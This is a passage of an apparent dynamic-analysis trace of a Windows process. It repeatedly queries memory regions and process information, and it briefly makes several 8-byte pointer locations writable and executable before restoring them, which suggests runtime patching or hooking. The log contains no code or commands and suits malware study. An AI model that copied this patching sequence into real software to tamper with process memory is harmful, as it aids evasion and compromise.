hProcess=0xffffffffffffffff, lpAddress=0x7ff967010000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff967010000, AllocationBase=0x7ff967010000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.976] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.976] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966ff0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966ff0000, AllocationBase=0x7ff966ff0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.977] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.977] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff970ee0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff970ee0000, AllocationBase=0x7ff970ee0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.977] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.977] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96b330000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96b330000, AllocationBase=0x7ff96b330000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.977] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.977] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966f10000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966f10000, AllocationBase=0x7ff966f10000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.977] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.977] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973bb0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973bb0000, AllocationBase=0x7ff973bb0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.977] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.977] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966e30000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966e30000, AllocationBase=0x7ff966e30000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.977] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.978] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96e000000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96e000000, AllocationBase=0x7ff96e000000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.978] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.978] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96cc10000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96cc10000, AllocationBase=0x7ff96cc10000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.978] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.978] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973be0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973be0000, AllocationBase=0x7ff973be0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.978] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.978] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966de0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966de0000, AllocationBase=0x7ff966de0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.978] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.978] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966d50000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966d50000, AllocationBase=0x7ff966d50000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.978] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.979] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966d00000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966d00000, AllocationBase=0x7ff966d00000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.979] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.979] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c450000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c450000, AllocationBase=0x7ff96c450000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.979] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.979] VirtualProtect (in: lpAddress=0x7ff96c544528, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.980] VirtualProtect (in: lpAddress=0x7ff96c544528, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.980] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff968e90000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff968e90000, AllocationBase=0x7ff968e90000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.980] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.980] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966b10000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966b10000, AllocationBase=0x7ff966b10000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.980] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.980] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96cbd0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96cbd0000, AllocationBase=0x7ff96cbd0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.980] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.980] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971f50000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971f50000, AllocationBase=0x7ff971f50000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.980] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.981] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff976f70000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff976f70000, AllocationBase=0x7ff976f70000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.981] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.981] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971f40000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971f40000, AllocationBase=0x7ff971f40000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.981] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.981] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96cf90000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96cf90000, AllocationBase=0x7ff96cf90000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.981] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.981] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966af0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966af0000, AllocationBase=0x7ff966af0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.981] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.981] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966ad0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966ad0000, AllocationBase=0x7ff966ad0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.981] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.981] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973590000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973590000, AllocationBase=0x7ff973590000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.981] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.982] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977cb0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977cb0000, AllocationBase=0x7ff977cb0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.982] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.982] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96d300000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96d300000, AllocationBase=0x7ff96d300000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.982] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.982] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96a270000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96a270000, AllocationBase=0x7ff96a270000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.982] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.983] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974170000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974170000, AllocationBase=0x7ff974170000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.983] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.983] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966ac0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966ac0000, AllocationBase=0x7ff966ac0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.983] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.983] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966a90000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966a90000, AllocationBase=0x7ff966a90000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.983] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.983] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9667d0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9667d0000, AllocationBase=0x7ff9667d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.983] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.983] VirtualProtect (in: lpAddress=0x7ff966868320, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.984] VirtualProtect (in: lpAddress=0x7ff966868320, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.984] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96b080000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96b080000, AllocationBase=0x7ff96b080000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.984] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.984] VirtualProtect (in: lpAddress=0x7ff96b2644c8, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.985] VirtualProtect (in: lpAddress=0x7ff96b2644c8, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.985] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c360000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c360000, AllocationBase=0x7ff96c360000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.985] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.985] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9664b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9664b0000, AllocationBase=0x7ff9664b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.985] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.985] VirtualProtect (in: lpAddress=0x7ff96662c498, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.985] VirtualProtect (in: lpAddress=0x7ff96662c498, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.986] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966400000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966400000, AllocationBase=0x7ff966400000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.986] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.986] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966360000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966360000, AllocationBase=0x7ff966360000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.986] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.986] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96edf0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96edf0000, AllocationBase=0x7ff96edf0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.986] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.986] VirtualProtect (in: lpAddress=0x7ff96ee9a398, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.987] VirtualProtect (in: lpAddress=0x7ff96ee9a398, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.987] VirtualProtect (in: lpAddress=0x7ff96ee9a3a0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.988] VirtualProtect (in: lpAddress=0x7ff96ee9a3a0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.988] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff970e80000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff970e80000, AllocationBase=0x7ff970e80000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.988] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.988] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9662f0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9662f0000, AllocationBase=0x7ff9662f0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.988] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.988] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96b950000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96b950000, AllocationBase=0x7ff96b950000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.988] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.988] VirtualProtect (in: lpAddress=0x7ff96bbbc190, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.989] VirtualProtect (in: lpAddress=0x7ff96bbbc190, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.989] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff966140000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff966140000, AllocationBase=0x7ff966140000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.989] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, 